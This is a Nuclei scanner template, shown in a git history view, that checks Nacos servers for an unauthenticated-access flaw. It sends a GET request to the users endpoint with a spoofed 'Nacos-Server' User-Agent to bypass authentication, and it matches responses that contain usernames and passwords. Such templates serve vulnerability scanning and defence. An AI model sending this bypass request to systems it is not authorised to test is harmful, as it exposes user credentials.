nuclei-templates/misconfiguration/unauthenticated-nacos-acces...

31 lines
615 B
YAML
Raw Normal View History

2021-01-06 07:29:33 +00:00
id: unauthenticated-nacos-access
2021-01-06 03:54:47 +00:00
info:
2021-01-06 07:29:33 +00:00
name: Unauthenticated Nacos access
2021-01-06 03:54:47 +00:00
author: taielab
severity: critical
2021-01-06 04:26:18 +00:00
2021-01-06 03:54:47 +00:00
# References:
# - https://github.com/alibaba/nacos/issues/4593
2021-01-06 04:26:18 +00:00
2021-01-06 03:54:47 +00:00
requests:
- raw:
- |
GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1
Host: {{Hostname}}
User-Agent: Nacos-Server
Content-Length: 2
2021-01-06 04:26:18 +00:00
2021-01-06 03:54:47 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
2021-01-10 23:20:14 +00:00
- '"username":'
- '"password":'
- '"totalCount":'
2021-01-06 03:54:47 +00:00
condition: and
part: body
- type: status
status:
- 200